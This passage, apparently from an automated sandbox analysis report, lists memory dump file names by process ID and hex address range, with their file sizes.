                                                                                                                                                                      • memory/4992-295-0x0000000005500000-0x0000000005501000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4992-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5000-312-0x0000000000980000-0x00000000009A3000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        140KB

                                                                                                                                                                      • memory/5000-292-0x0000000000250000-0x0000000000251000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5000-318-0x00000000009B0000-0x00000000009B1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5000-304-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5000-313-0x000000001B000000-0x000000001B002000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/5000-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5012-372-0x00000000005A0000-0x00000000006EA000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.3MB

                                                                                                                                                                      • memory/5012-261-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5032-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5044-317-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5044-332-0x00000000055F0000-0x00000000055F1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5044-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5044-306-0x0000000000730000-0x0000000000731000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-340-0x0000000003180000-0x0000000003181000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5068-315-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.6MB

                                                                                                                                                                      • memory/5068-353-0x00000000031C0000-0x00000000031C1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-323-0x0000000001360000-0x0000000001361000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-336-0x0000000005950000-0x0000000005951000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-338-0x0000000000DD0000-0x0000000000DD1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5068-357-0x0000000005330000-0x0000000005331000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5100-374-0x0000000000400000-0x00000000004C0000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        768KB

                                                                                                                                                                      • memory/5100-370-0x00000000020C0000-0x000000000215D000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        628KB

                                                                                                                                                                      • memory/5100-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5112-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5276-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5332-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5348-441-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5388-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5584-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5636-521-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5796-454-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/6056-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/6096-476-0x0000000000000000-mapping.dmp